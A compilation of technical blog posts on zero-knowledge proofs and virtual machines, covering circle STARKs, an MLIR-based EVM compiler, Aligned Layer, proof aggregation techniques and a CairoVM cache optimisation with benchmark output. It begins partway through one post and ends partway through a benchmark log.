When we impose the constraints on the trace polynomials and compute the quotients, we arrive at the composition polynomial. Its degree depends on the maximum degree of the constraints, and we may need to split it in several chuncks. In the univariate case, we can do this decomposition as follows:

$p(x) = p_0 (x) + x^{n + 1} p_1 (x) + x^{2n + 2} p_2 (x)$

Each $p_k (x)$ has a degree at most $n$. In circle STARKs, decompose into functions $q_1 , q_2 , … q_d$ and a parameter $\lambda$ such that

$p = \lambda v_H (x) + \sum_k v_{ H } q_k / v_{ H_k }$

where the $H_k$ are disjoint twin cosets of size $n$ and their union yields $H$. The additional parameter $\lambda$ is needed because of the dimension gap discussed on the paper.</p>
Circle FRI faces some modifications with respect to classical FRI. First, we need to decompose the function to which we will apply FRI as $f = g + \lambda v_n (x)$. This decomposition is crucial to ensure that the function spaces halve at every folding step, reaching the space of constant functions at the end of the protocol. The folding follows a similar procedure to the one we encountered in the circle FFT; after the first folding, we have to deal with univariate functions and the square mapping $x \rightarrow 2x^2 - 1$.</p>
Summary</h2>
Circle STARKs have shown amazing performance</a> by leveraging Mersenne primes, which have the fastest known finite field arithmetic. They are able to work around the non-smooth structure of fields defined over Mersenne primes by moving to the circle group but closely follow their classical STARKs analogues (albeit with some subtleties). Luckily, most of these subtleties are hidden from developers and circle STARKs, together with efficient lookups (such as those based on LogUp and GKR), can help improve the performance of general-purpose zkvms.</p>


EVM performance boosts with MLIR
Unknown — Fri, 14 Jun 2024 00:00:00 +0000
We implemented 75% of the functionality of the Ethereum Virtual Machine, in two weeks, with five new hires, compiling the VM opcode logic to native machine code with a state of the art compiler backend. Why did we do this? How?

The TL;DR is: to get a performance boost (recent benchmark results show a throughput 300% to 600% times higher than revm</em> , when running factorial and fibonacci programs), to increase implementation diversity, and to use it in our upcoming implementation of an Ethereum Execution client.</p>
Seeing as many other VMs compile bytecode to native instructions, it struck us as odd that Ethereum Virtual Machine (EVM) implementations don’t do the same. Doing Cairo Native we learned a lot about MLIR/LLVM</a>, and so we started the EVM-MLIR project with the objective of having a faster alternative to revm</em>.</p>
We wanted to get a sense of feasibility as soon as possible, so we started by specifying the problem (and solution) well, laying out the project skeleton and utilities, and making sure the new team had a solid base to work on. With clear tasks ready to be assigned, we managed to implement 111 out of 149 opcodes from mainnet in two weeks!</p>
Applying MLIR to the EVM</h2>
The EVM is a stack-based virtual machine whose compiled bytecode represents a sequence of instructions consisting of 1-byte opcodes with implicit parameters. Push operations also include up to 32 bytes of extra data (the number to push to the stack).</p>
Its memory architecture consists of five components:</p>
    * Stack: stores up to 1024 256-bit wide integers. Each operation pops operands from it, and/or pushes results to it. If a program runs out of stack it terminates.</span></span>
    * Memory: byte array, which allows random addressing by byte. Used for storing and accessing volatile data in an ordered manner.</span></span>
    * Calldata: a read-only byte array similar to the _Memory_ sent as input on each transaction. Some operands allow copying data from the calldata to the stack or memory.</span></span>
    * Storage: dictionary with 256-bit keys and values. Changes are persisted, unless the transaction is reverted.</span></span>
    * Transient storage: similar to _Storage_ , but changes are discarded at the end of a transaction.</span></span></code></pre>
We can see that the execution model of the EVM is exceedingly simple, on purpose.</p>
A naive interpreter loop on the instruction sequence is simple to implement but difficult to optimize. There are many approaches to implementing bytecode interpreters (it’s a fun and educating project!) but removing interpreter overhead by directly translating each opcode to machine instructions is very efficient. The only difficulty is needing a compiler backend and a way to link and invoke the generated code.</p>
We decided to take advantage of our recent experience with MLIR and write a library to translate each operation to a sequence of MLIR blocks containing the MLIR operations that implement each opcode’s behaviour, string them up by connect each one to the next. Finally this representation can be translated to LLVM IR and be put through LLVM’s optimizer passes.</p>
Not only did we have to translate each opcode’s logic in terms of MLIR operations, we also needed to translate the memory architecture:</p>
    * Stack: we pre-allocate the max stack size (1024 elements) before starting the aforementioned sequence. Current and base pointers are used to maintain the stack and check for overflows or underflows.</span></span>
    * Memory: we handle the memory allocation in Rust, extended as needed by FFI callbacks.</span></span>
    * Calldata: we store it on Rust's side, and give it as input to the EVM.</span></span>
    * Storage/Transient storage: will be handled via syscalls, with an API similar to _revm_.</span></span></code></pre>Benchmarks</h3>
Factorial</h4>
This program computed the Nth factorial number, with N passed via calldata. We chose 1000 as N and ran the program on a loop 100,000 times.</p>
MacBook Air M1 (16 GB RAM)</h5>
| Mean [s] | Min [s] | Max [s] | Relative

—|—|—|—|—

EVM-MLIR | 1.062 ± 0.004 | 1.057 | 1.070 | 1.00

revm | 6.747 ± 0.190 | 6.497 | 7.002 | 6.36 ± 0.18</p>
AMD Ryzen 9 5950X 16-Core Processor (128 GB RAM)</h5>
| Mean [s] | Min [s] | Max [s] | Relative

—|—|—|—|—

EVM-MLIR | 1.363 ± 0.151 | 1.268 | 1.691 | 1.00

revm | 5.081 ± 0.685 | 4.839 | 7.025 | 3.73 ± 0.65</p>
Fibonacci</h4>
This program computed the Nth fibonacci number, with N passed via calldata. Again, we chose 1000 as N and ran the program on a loop 100,000 times.</p>
MacBook Air M1 (16 GB RAM)</h5>
| Mean [s] | Min [s] | Max [s] | Relative

—|—|—|—|—

EVM-MLIR | 1.010 ± 0.016 | 0.990 | 1.040 | 1.00

revm | 6.192 ± 0.119 | 6.094 | 6.374 | 6.13 ± 0.15</p>
AMD Ryzen 9 5950X 16-Core Processor (128 GB RAM)</h5>
| Mean [s] | Min [s] | Max [s] | Relative

—|—|—|—|—

EVM-MLIR | 1.496 ± 0.236 | 1.243 | 1.756 | 1.00

revm | 4.586 ± 0.066 | 4.537 | 4.727 | 3.07 ± 0.49</p>
Code for these benchmarks can be seen in our repo: lambdaclass/evm_mlir</a>, along with documentation on how to reproduce them. We’re currently running them on our CI to detect performance regressions, and we’ll be adding more complex programs in the near future.</p>
Next steps</h3>
We now leave a skeleton crew to finish the remaining functionality and to continue optimizations, and focus on our new Execution Client – nicknamed ethrex</em> after ETHereum Rust EXecution.</p>
As said, our objective for our new Execution Client is giving the Ethereum ecosystem an alternative Rust Execution client with simple, straightforward code in the coming two months. After the MLIR EVM is ready, we intend to integrate it to ethrex</em> , as part of a dog-fooding effort.</p>


Aligned Layer: First Aligned Testnet in EigenLayer
Unknown — Fri, 03 May 2024 00:00:00 +0000
Introduction</h2>
Zero-knowledge and validity proofs have gained attention due to their capabilities in decentralized private computation, scaling blockchains, identity protocols, and verifiable machine learning, among others. They allow one party, the prover, to show to other parties, the verifiers, that a given statement is true in a time- and memory-efficient way. Zero-knowledge proofs allow us to prove the statement without revealing anything else other than its validity. They are becoming one of the main building blocks in web3. However, even though the technology has been around since the mid 1980’s, it was not at the heart of Bitcoin and Ethereum due to the lack of efficient constructions for such applications. This leads to restrictions in the types of proof systems we can verify, introduces overhead in verification time and costs in Ethereum, and also increases development and go-to-market times, since we have to optimize the verification contracts to reduce gas usage (and, therefore, costs). Aligned Layer</a>, powered by EigenLayer, provides a decentralized network of verifiers that can check proofs from any proof system in a fast and cost-effective way.</p>
With the introduction of zk-rollups and identity protocols, the demand for on-chain verification of zero-knowledge proofs has increased dramatically. These verifications compete for blockspace with other applications in Ethereum, such as DeFi and NFTs, leading to increasing costs. Luckily, there are ways of reducing on-chain verification, at the expense of time overhead, and a low marginal off-chain cost. Aligned Layer offers a solution without introducing time overhead, and lets developers choose whether they want to wait for the proof to be verified on Ethereum before proceeding further.</p>
This post will explain what are succinct, non-interactive arguments of knowledge, how proofs are verified in Ethereum, strategies to reduce costs, what can Aligned Layer offer to Ethereum and how it differs from aggregation layers, with the capacity to verify several orders of magnitude more proofs than Ethereum.</p>
Succinct, Non-Interactive Arguments of Knowledge (SNARKs)</h2>
Succinct, non-interactive arguments of knowledge (SNARKs) allow us to prove the validity of a statement in a way that is much faster than it would take to check it naïvely. For example, say we wanted to show that we computed the 1,073,741,824th Fibonacci number correctly. The simplest way anyone could check the calculation is by recomputing the whole sequence, $a_0 = 1$, $a_1 = 1$, $a_2 = 2$, $a_3 = 3$, $a_{n + 2} = a_{n + 1} + a_n$, which is reexecuting the computation we did. This is how blockchains solved the issue of agreement between different parties: reexecution and consensus. However, this proves computationally intensive and it is problematic if we want to check computations we cannot check by ourselves due to limited computing power. SNARKs achieve sublinear verification (typically, logarithmic time verification), which means that we need to perform less work. It also means that we do not need to know all the steps in the computation (more precisely, we do not need the whole witness). Using STARKs, proof sizes and verification times are in the order of $\log^2 n$, where $n$ is the length of the program. In the case of our Fibonacci, $n = 2^{30}$, so proof sizes and times would be some constants times $30^2 = 900$, which is way smaller than $2^{30}$. So, instead of reexecution, we verify proofs, saving huge amounts of time and memory.</p>
There are different SNARK constructions, based on either linear probabilistically checkable proofs (PCP) -such as Groth 16- and interactive oracles proofs (IOP) -such as Plonk or STARKs-, using different cryptographic assumptions and commitment schemes (collision resistant hash functions, hardness of the discrete log problem, knowledge of exponent), presence or absence of trusted ceremonies, arithmetization schemes, using multivariate or univariate polynomials, etc. This results in a wide variety of SNARKs, with different trade-offs in proof size, verification time, prover time, and the types of applications they are suited for. At the beginning the construction of SNARKs involved expressing the computations as circuits, which was a developer intensive operation, requiring expert knowledge and error/bug prone. With the advent of general purpose zkvms this task has been greatly simplified, allowing developers to write their programs in a higher level language, such as Rust, and prove them without having to write the circuits themselves.</p>
Verification in Ethereum</h2>
We have several options to prove computations, depending on our needs. However, not all proof systems are easy or cheap to verify in Ethereum, due to two factors: storage and gas costs associated with running the verification algorithm. For example</a>, the cost of verifying a STARK is around 5,000,000 gas, while Plonk based proofs are below 1,000,000 gas. Due to precompiles, SNARKs based on pairings (such as Groth 16 and proof systems using the KZG commitment scheme) tend to be less expensive, since the pairing operation costs around 200,000 gas and elliptic curve operations of the BN254 elliptic curve, such as addition and scalar multiplication are rather cheap.</p>
There are several limitations to the proof systems we can verify directly in Ethereum. For example, inner product argument based proof systems such as Mina’s Kimchi (which has efficient recursion via Pickles) or Brakedown-based such as Binius (with square root sized proofs) become very expensive to verify, either because of the number of operations they involve or because of proof size.</p>
In order to verify these proofs, we need to wrap them using a more cost effective solution for Ethereum, such as KZG Kimchi for Mina. However, this comes at the expense of simulating costly operations such as foreign field arithmetic and lots of elliptic curve operations, taking a lot of effort in terms of development and go-to-market time. Besides, if you invent a new proof system which is very efficient but not EVM-friendly, you need to spend a lot of time developing the wrapper to make it cheap to verify in the EVM.</p>
Amortizing costs</h2>
The best ways to reduce costs in Ethereum are related to shrinking proof and public input size (thus reducing storage) and proving large computations instead of shorter ones (for example, verifying a proof for all the transactions in one block is way less expensive than verifying each transaction separately). The first strategy involves using constant proof size SNARKs, such as Groth 16 or Plonk, and providing a commitment to the public input, instead of the whole public input. The second one involves bundling several computations in one, such as all the transactions in one block. This idea was used in Starknet, proving the execution of the bootlader program in the Cairo-vm. However, many proof systems have greater memory use when proving larger computations, limiting the size of the computations we can prove using this approach. To deal with these issues, we can use recursive proof composition to aggregate several proofs into one; thus, the cost of verification in Ethereum will be split between the different computations we checked.</p>
Batch verification</h2>
Some schemes allow for batch verification: by doing some extra operations, we can check several proofs together, splitting most of the cost between the proofs. For example, if we have several evaluation proofs from a KZG commitment scheme, we can check them together by sampling random scalars, instead of verifying each separately. Even though one KZG verification can be expensive (it involves one pairing operation), by batching several proofs together, the cost per proof becomes negligible. BLS signatures exploit this property, too. Even though the BLS signatures are more expensive to check than ECDSA signatures, with batch verification we can make overall verification costs much smaller.</p>
Aggregation</h2>
Proof aggregation is usually carried out by recursive verification, using an n-ary tree structure (one common case is a binary tree, taking 2 proofs and producing a proof of the correctness of the verification of the two proofs). However, this is not the only technique available. For an overview of some techniques, see our previous blog post</a>. Proof recursion is a good technique for aggregation, but it usually involves expensive operations. For example, it may involve non-native arithmetic (the proof we want to verify is over some finite field, but the verification’s proof is over a different field), performing expensive elliptic curve operations such as pairings or calculating many hashes (in hash-based systems, such as STARKs).</p>
Some projects focus on reducing costs by providing proof aggregation, either as a service or as part of their protocol (for example, rollups). However, proof aggregation is limited to a few proof systems, and they incur in some overhead. Since they want to achieve cheap verification in Ethereum, they have to end up wrapping their proofs into an EVM-friendly proof.</p>
Looking for speed?</h2>
The main drawbacks with proof aggregation are the overhead associated with the aggregation and the need for several proofs to bundle together. This means that we have an increase in latency (which could make some applications infeasible) and that some applications may have trouble in scaling (for example, you are just starting a new protocol which is not widely used yet, or you offer a very valuable service but does not have many users).</p>
Aligned Layer offers fast and cheap verification, which is different from proof aggregation. Aligned Layer can be faster than Ethereum because of the following reasons:</p>
    1. Aligned Layer does not run the verification on top of the EVM. It just runs the code natively in CPUs or even in GPUs.</span></span>
    2. Aligned Layer can leverage parallelization, which is something Ethereum cannot.</span></span>
    3. The EVM cannot process operations exceeding 30,000,000 gas per block, even if there is unused computing capacity.</span></span>
    4. Ethereum verifiers are optimized for gas usage, whereas verification in Aligned Layer can be optimized for speed. Use of faster finite field arithmetic, more efficient elliptic curve operations or faster hashing will result in higher throughput in Ethereum.</span></span>
    5. Aligned Layer can use other DA layers to further reduce storage costs.</span></span>
    6. Aligned Layer can verify proof systems that are not feasible in Ethereum, either because their proof size is large or the operations involved are expensive in Ethereum (such as Kimchi or Binius).</span></span>
    7. Since verification costs in Aligned Layer are smaller than Ethereum, the demand for ZK verification is very likely to increase due to lower entry costs.</span></span></code></pre>
To see the potential advantages of Aligned Layer for verification over Ethereum, we will do some rough estimates of performance. The numbers are summarized in the following table:</p>
Proof System</th> Groth 16</th> STARKs</th></tr></thead>

Gas cost Ethereum</td> 220,000</td> 5,000,000</td></tr>
Proofs per block in Ethereum</td> 136</td> 6</td></tr>
Verification time, consumer-end hardware (ms)</td> 1-3</td> <25</td></tr>
Proofs per block time</td> 4000</td> 480</td></tr>
Improvement over Ethereum</td> 29x</td> 80x</td></tr>
</tbody></table>
A Groth16 proof costs between 220,000 gas and 300,000 gas; using the full capacity of Ethereum, this amounts to at most 136 verifications every 12 seconds. Verification of the same proofs in consumer grade hardware, without parallelization, takes between 1 and 3 ms, leading to at least 4,000 Groth16 proofs over the same period of time, nearly 30 times more proofs. For STARK proofs, which cost around 5,000,000 gas, it is just 6 proofs per block. STARK verification over CPUs depend on program size, but could be below 25 ms, leading to at least 480 proofs, an 80x improvement. The numbers of Ethereum represent its maximum nominal capacity and will not improve unless the gas limit is increased or proof gas use is further reduced (however, there are other applications running on Ethereum, which compete for this limited verification capacity). Aligned Layer can use more powerful devices, optimize code for speed and leverage a high degree of parallelization. Moreover, since Aligned Layer only verifies proofs, its computing power is not shared with other applications.</p>
Advantages of having a fast and a slow mode</h2>
Aligned Layer offers the best of both worlds with its fast and slow modes. Aligned Layer’s goal is to verify any proof system quickly and new proof systems can be incorporated easily. After getting Aligned Layer’s verification, which is backed by a subset of Ethereum’s validators, developers can use the result to move forward. It is also cheaper since it is not constrained by the EVM. Besides, if you develop a new proof system, you just need to provide the verifier code in Rust and have no need to code a wrapper, reducing development time.</p>
Having cheap verification makes easier for protocols and applications to adopt zero-knowledge proofs, reducing the barrier of entry. Besides, it helps scale zero-knowledge proofs since the amount of proofs per unit time increases, making it easier to achieve a reasonable number of proofs to aggregate and check in Ethereum, leading to a reduction in the cost of verification per proof. The slow mode adds additional security since the final verification is done in Ethereum. Moreover, if the validators misbehaved in the fast mode, the slow mode will override any results they provided and lead to slashing.</p>
Conclusions</h2>
There has been a growing demand for zero-knowledge proofs due to their applications in decentralized private computing, blockchain scalability, verifiable machine learning and identity protocols. The demand for on-chain verification in Ethereum has grown, but single proof verification costs remain high and compete with other applications. Proof aggregation reduces costs by bundling several proofs into one, at the expense of higher latency, and a small marginal off-chain cost, which is expected to go down as prover technology improves. However, the overhead introduced and the need for a sufficiently large number of proofs limit the types of applications that can effectively leverage zero-knowledge proofs, due to latency requirements or scale. Aligned Layer provides a decentralized network of verifiers, backed by the trust of Ethereum via EigenLayer, providing fast and cheap verification of proofs, providing low latency verification and low costs. It is different from aggregation layers, since its main goal is to verify proofs and allow developers to choose the best proof system for their needs. Aggregation works by bundling proofs and dividing the fixed cost of verification between the proofs but developers must wait until settlement in Ethereum. In Aligned Layer, it is up to developers to choose whether they prefer the fast or the slow mode. We think Aligned Layer will accelerate the adoption of zero-knowledge proofs in applications and, together will EigenLayer, will help bring further innovation to Ethereum.</p>


Proof aggregation techniques
Unknown — Mon, 25 Mar 2024 00:00:00 +0000
Proof aggregation techniques</h1>
Introduction</h2>
SNARKs (succinct, non-interactive arguments of knowledge) and STARKs (scalable, transparent arguments of knowledge) have gained widespread attention due to their applications in decentralized private computation and scaling blockchains. They are tools that allow us to prove to another party that we did a computation correctly so that the verification is much faster than re-executing the computation. The size of the proof is much smaller than all the information needed to prove it. For example, we can prove that we know the solution to a Sudoku game without fully providing it. In the case of the execution of a virtual machine, to prove correctness, we should see how the machine’s registers change at every cycle; the verifier does not need to know it completely but rather queries the registers at some point. For a discussion on the impact of SNARKs/STARKs, see our post</a>.</p>
Proving large programs or computations can be expensive since this introduces an overhead in running them. In some cases, the computation can be broken down into several smaller computations (for example, proving the transactions inside a block can be done by proving each transaction separately), but this has two drawbacks: proof size and verification time scale linearly with the number of components. Both hurt scalability because we need more time to verify the entire computation, and it increases memory use. We can solve this by bundling all the proofs and doing just one verification. We can use several techniques; the best one will depend on the type of proof system we use and our particular needs. This post will discuss some of the alternatives we have and their tradeoffs in terms of prover time, verification time, and proof size.</p>
Aggregation techniques</h2>
These techniques will allow us to prove several statements together, reducing the blowup in proof size and verification time introduced by checking several statements. For an explanation of some techniques, see the following video</a>.</p>
Proof recursion</h2>
SNARKs/STARKs let us check the validity of any NP statement in a time- and memory-efficient way. The amount of information needed to prove a statement is much smaller than the size of the required witness to check the statement. For example, in STARKs, the verifier does not need to see the whole execution trace of the program; it just needs some random queries. In Plonk, the verifier has the evaluations of the trace polynomials at a random point, which is much less than the $3n$ values in the trace.</p>
How does recursion work? The prover proves that he verified a proof $\pi$ corresponding to some computation with public input $u$. The image below shows the flow for recursion.</p>
</p>
The prover takes the public input, the witness, and the program and generates the proof $\pi$ attesting to the validity of the computation. The prover then takes the proof $\pi$ and original circuit as witnesses, the public input, and the verification circuit (the operations the verifier would have to do to check the statement) and obtains a new proof $\pi^\prime$, showing that the prover knows the proof $\pi$ which fulfills the verification circuit with the given input. The verifier can check the proof $\pi^\prime$, which shows that the verification done by the prover is valid, which in turn implies the correctness of the first computation. In the case of STARKs, if the trace for the verification operation is shorter than the trace for the original program, proof size and verification time are reduced (since they depend on the trace length, $n$).</p>
We can also use two different provers. For example, we can prove the first program with STARKs, which is fast but has larger proofs, and then use Groth 16/Plonk, which has smaller proof sizes. The advantage is that the second case does not need to handle arbitrary computations, so we can have just one optimized circuit for STARK verification. The result is one small proof with fast verification.</p>
We can also use the same structure and prove the verification of several proofs.</p>
</p>
One problem we face is that even though the proof size is reduced, the public input increases linearly. We can solve this by providing a hash/commitment to all the public input and passing it as part of the witness. During the verification, we have to check that the hash of the public input in the witness corresponds to the hash/commitment of the public input. Proof recursion can be handled more efficiently by building a tree structure, increasing the degree of parallelization.</p>
</p>
Proof recursion is used in several projects to reduce proof size and make verification cheaper, such as Starknet</a>, Polygon ZKEVM</a>, and zkSync</a>.</p>
Even though proof recursion has many advantages, it adds workload to the prover. In proof systems such as STARKs, the prover has to compute lots of hashes, which are expensive operations. Luckily, there have been advances in algebraic hash functions (less costly to prove) and protocols such as STIR</a> that reduce the number of hashes needed to generate proofs (post coming soon). In SNARKs working over elliptic curves, the proofs consist of elements in the curve (with coordinates over a field $F_p$) and scalar represented in $F_q$ (the scalar field). This generates a problem since we have to do operations over $F_p$ to compute operations over the curve. Still, the scalars in the circuit live in $F_r$, leading to non-native field operations. Here</a> you can find a circuit to verify Groth 16 proofs, taking around 20 million constraints. As discussed in the following section, curve cycles are a nicer alternative to avoid field emulation.</p>
Cycles of curves</h3>
We have the problem that coordinates for the curve $E$ live in $F_p$, but the scalar field is $F_r$. If we can find a curve $E^\prime$ defined over $F_r$ and scalar field $F_p$, then we could check proofs over $E$ using $E^\prime$. Pairs of curves with these characteristics are called a cycle of curves. Fortunately, some curves of the form $y^2 = x^3 + b$ satisfy the conditions. Pallas and Vesta curves (known together as Pasta curves) form a cycle and are used in Mina’s Pickles</a> and Halo 2</a>. We covered some of the basics of Pickles in our previous post</a>. Pickles uses two accumulators (each using a different curve) and defers some checks to the next step. This way, it can avoid expensive verifications and efficiently deliver incrementally verifiable computation.</p>
</p>
Folding and accumulation schemes</h2>
One of the drawbacks of full recursion is that we need to prove the whole verification, which can be very expensive. For example, in recursive STARKs, we must compute all the hashes and verify all algebraic operations to get to a new proof. Folding schemes provide an alternative to full verification by combining several instances and accumulating them. Nova</a> introduced a folding scheme for R1CS. The key idea is that if we have two solutions $(u_1 , w_1 )$ and $(u_2 , w_2 )$ for R1CS, we can combine them into a single claim $(u , w)$ for a committed relaxed-R1CS (a generalization of R1CS).</p>
</p>
We can then generate a proof for the unified claim, which amounts to the validity of all instances.</p>
SNARKPack</h2>
Some proof systems have proofs that can be aggregated by other methods, such as SNARKPack</a> for Groth 16. The proof for Groth 16</a> consists of three elements $\Pi = (\pi_1 , \pi_2 , \pi_3)$, where $\pi_1, \pi_3$ belong to the group $G_1$ of an elliptic curve and $\pi_2$ belongs to $G_2$. The check in Groth 16 is the following pairing equation,

$e(\pi_{1} , \pi_{2} ) = Y e(\pi_3 , D)$

where $Y$ depends on the public input and the parameters of the ceremony, and $D$ is part of the parameters. If we have several proofs $\Pi_k = (\pi_{1k} ,\pi_{2k}, \pi_{3k} )$, we can combine the different checks,

$e(\pi_{1k} , \pi_{2k} ) = Y_k e(\pi_{3k} , D)$

using random numbers $r_k$ such that

$\prod e(\pi_{1k} , \pi_{2k} )^{ r_k } = \prod Y_k^{ r_k } \prod e(\pi_{3k} , D)^{ r_k }$</p>
We can rewrite this as

$Z_{AB} = Y^\prime e(Z_C , D)$

where

$Z_{AB} = \prod e(\pi_{1k} , \pi_{2k} )^{ r_k }$

$Y^\prime = \prod Y_k^{ r_k }$

$Z_C = \prod \pi_{3k}^{ r_k }$

The verifier needs to check that $Z_{AB}$ and $Z_C$ are consistent with the proof triples $\Pi_k$ provided. This is done via a target inner pairing product and a multiexponentiation inner product. The advantage is that the combined proof size is practically independent of the number of proofs aggregated.</p>
Continuations</h2>
Continuations</a> are a mechanism by which we can split a complex computation into smaller segments that can be computed and proven separately. This enables faster proving by leveraging parallelization and reducing the provers’ memory footprint. The downside is a blowup in proof size unless implemented in rollup form. However, let’s take advantage of the independent proofs and use a folding scheme to combine all the claims to the same verification circuit or recursive proving. We can wrap all the segments into a single proof (which could also be a SNARK with constant proof size).</p>
Summary</h2>
Over the last decade, we have seen the development of new proof systems and techniques to show the validity of computations in a memory- and time-efficient way. However, we need to break down large computations into smaller, independent computations (for example, proving a block of transactions by proving each transaction separately). The downside is that we have a blowup in proof size and verification time, which can hurt scalability or increase costs. Luckily, there are several techniques for aggregating proofs, so verifying a single proof implies the validity of all the other proofs. While proof recursion offers a highly parallelizable way to aggregate proofs, it involves costly operations, such as field emulation and hash functions. Accumulation or folding schemes provide an alternative to full verification by deferring some checks until a final verification step.</p>


Beyond Single-Core: Enhancing VM Efficiency in Parallel Environments
Unknown — Fri, 22 Mar 2024 00:00:00 +0000
At LambdaClass, benchmarks and performance analysis are critical aspects of our development process. We always perform performance analysis in every PR via our CI pipelines to spot any performance issues.</p>
The Cairo virtual machine</a> is not an exception since it is a core part of the Starknet</a> network. In this post, we will delve into how we investigated a performance regression and then optimized a core data structure in the library to improve its multicore performance.</p>
</p>
A first look</h2>
Some background: Not long ago, we introduced an optional feature, lambdaworks-felt,</code> which marked a significant improvement in our performance metrics. It uses the Felt (field element) implementation from our cryptography library, LambdaWorks</a>, which replaced a more naive implementation using BigInt</code>.</p>
Last week, the Pathfinder</a> team from Equilibrium (as always, we want to thank them for finding and raising this issue) observed an unexpected scaling behavior when they tried to re-execute some Sepolia testnet blocks using their re_execute</code> tool that spins up several CairoVMs to run the block’s transactions in parallel.</p>
When several instances of the CairoVM with the lambda works-felt feature enabled are executed on a hyperthreading-enabled processor, execution time does not scale with the number of enabled threads as well as without the lambda works-felt feature.</p>
</p>
The figure, contributed by the Pathfinder team, shows the results of a benchmark performed on a Ryzen 5900X. As you can see, the CairoVM with the lambdaworks-felt feature performs better when you execute it with fewer threads. Still, the run with defaults implementation (Felt type implemented using the num_bigint</a> crate) scales better as the number of threads increases.</p>
Digging deeper</h2>
Our first task was to reproduce what had been reported. Once we saw the same results as the Pathfinder team, we could start investigating possible causes. After that, we started investigating this behavior and found that we had many cache misses when using the lambdaworks-based felt.</p>
VM with Bigint felt:</p>
$ perf stat -e cache-misses ./binaries/re_execute_main sepolia-testnet_0.11.0_47191.sqlite 47000 47191</span></span>
</span>
 Performance counter stats for './binaries/re_execute_main sepolia-testnet_0.11.0_47191.sqlite 47000 47191':</span></span>
</span>
        2094269051      cache-misses</span></span>
</span>
       5.926431912 seconds time elapsed</span></span>
</span>
     168.877378000 seconds user</span></span>
       3.675086000 seconds sys</span></span></code></pre>
VM with Lambdaworks felt:</p>
$ perf stat -e cache-misses ./binaries/re_execute_main_lambdaworks sepolia-testnet_0.11.0_47191.sqlite 47000 47191</span></span>
</span>
 Performance counter stats for './binaries/re_execute_main_lambdaworks sepolia-testnet_0.11.0_47191.sqlite 47000 47191':</span></span>
</span>
        2426557083      cache-misses</span></span>
</span>
       6.931543878 seconds time elapsed</span></span>
</span>
     197.086250000 seconds user</span></span>
       6.588698000 seconds sys</span></span></code></pre>
So, here we can see that the lambdaworks felt has 16% more cache misses than the BigInt implementation.</p>
How does this inform our search for a cause? We talked to the team member who originally benchmarked the CairoVM and its relation to memory allocation when running and integrated lambdaworks-felt into the CairoVM. When we showed him these results, he mentioned that looking at the felt layout in memory when the VM is running would be a good idea.</p>
When the CairoVM runs a program, it stores the felt values in its memory representation, which encodes the rules and guarantees necessary for proving. So for a running program, memory is a collection of MemoryCell</code>s, which in turn wraps a boolean that signals if the memory cell was accessed during the program execution and a MaybeRelocatable</code> value, an enum that can be either a felt or a Relocatable value:</p>
pub(crate) struct MemoryCell(MaybeRelocatable, bool);</span></span>
</span>
</span>
pub enum MaybeRelocatable {</span></span>
    RelocatableValue(Relocatable),</span></span>
    Int(Felt252),</span></span>
}</span></span></code></pre>
When looking at cache issues, one usually looks at the shape or layout that values take when in memory. We noticed that when using the lambdaworks-felt</code> feature, the MemoryCell</code> structure size increased from 40 to 48 bytes, which was the root cause of the increase in cache misses when running parallel workloads.</p>
We can guess that since multiple VMs are trying to populate the cache with their values, felts running over a line would cause more cache thrashing.</p>
Another factor to take into account is the use of SMT (Simultaneous multithreading,** also known as Hyper-Threading) in AMD and Intel CPUs. This technique basically runs two logical cores inside a single physical core, which usually improves overall performance.</p>
But that’s not always the case; sometimes, it gets in the way. For example, one logical core can evict cached items that later the other logical core will need, leading to more cache misses.</p>
Just guessing is magical thinking, which is for astrologists, so we decided to implement a change and measure the impact.</p>
To address this, we refactored that structure to a more cache-friendly representation. The new optimized MemoryCell</code> can now fit in half a 64-byte cache line instead of almost a full cache line. The new structure now stores the data and metadata in a raw form using the spare bits in the felt representation, and the MaybeRelocatable</code> instances are built as needed from it.</p>
/// [`MemoryCell`] represents an optimized storage layout for the VM memory.</span></span>
/// It's specified to have both size an alignment of 32 bytes to optimize cache access.</span></span>
/// Typical cache sizes are 64 bytes; a few cases might be 128 bytes, meaning 32 bytes aligned to</span></span>
/// 32 bytes boundaries will never get split into two separate lines, avoiding double stalls and</span></span>
/// reducing false sharing and evictions.</span></span>
/// The trade-off is extra computation for conversion to our "in-flight" `MaybeRelocatable` and</span></span>
/// `Felt252` as well as some extra copies. Empirically, this seems to be offset by the improved</span></span>
/// locality of the bigger structure for Lambdaworks. There is a big hit from the conversions when</span></span>
/// using the `BigUint` implementation, since those force allocations on the heap, but since that's</span></span>
/// dropped in later versions anyway it's not a priority. For Lambdaworks, the new copies are mostly</span></span>
/// to the stack, which is typically already in the cache.</span></span>
/// The layout uses the 4 MSB in the first `u64` as flags:</span></span>
/// - BIT63: NONE flag, 1 when the cell is actually empty.</span></span>
/// - BIT62: ACCESS flag, 1 when the cell has been accessed in a way observable to Cairo.</span></span>
/// - BIT61: RELOCATABLE flag, 1 when the contained value is a `Relocatable`, 0 when it is a</span></span>
/// `Felt252`.</span></span>
/// `Felt252` values are stored in big-endian order to keep the flag bits free.</span></span>
/// `Relocatable` values are stored as native endian, with the 3rd word storing the segment index</span></span>
/// and the 4th word storing the offset.</span></span>
#[repr(align(32))]</span></span>
pub(crate) struct MemoryCell([u64; 4]);</span></span></code></pre>
After this change, when we re-execute some old Sepolia testnet blocks, we can see that the new cache-friendly MemoryCell</code> scales better when using hyper threading. Outperforming both the old MemoryCell</code> with a BigUint</code> -backed Felt and our previous implementation of the MemoryCell</code> with the Lambdaworks</code> felt.</p>
</p>
Benchmarks run on AMD Ryzen 9 5950X 16-Core Processor, Architecture:x86, CPU(s): 32</p>
That figure was generated with the data extracted by running hyperfine, a CLI-based benchmarking tool, with different number of threads so we can get how each change performed as we increase the number of threads.</p>
Running benchmark for 1 threads</span></span>
Benchmark 1: re_execute_main threads: 1</span></span>
  Time (abs ≡):        57.351 s               [User: 55.107 s, System: 2.174 s]</span></span>
</span>
Benchmark 2: re_execute_fixed_felt threads: 1</span></span>
  Time (abs ≡):        44.760 s               [User: 42.510 s, System: 2.197 s]</span></span>
</span>
Benchmark 3: re_execute_main_lambdaworks threads: 1</span></span>
  Time (abs ≡):        47.458 s               [User: 45.454 s, System: 1.948 s]</span></span>
</span>
Summary</span></span>
  re_execute_fixed_felt threads: 1 ran</span></span>
    1.06 times faster than re_execute_main_lambdaworks threads: 1</span></span>
    1.28 times faster than re_execute_main threads: 1</span></span>
Running benchmark for 2 threads</span></span>
Benchmark 1: re_execute_main threads: 2</span></span>
  Time (abs ≡):        28.247 s               [User: 54.708 s, System: 1.647 s]</span></span>
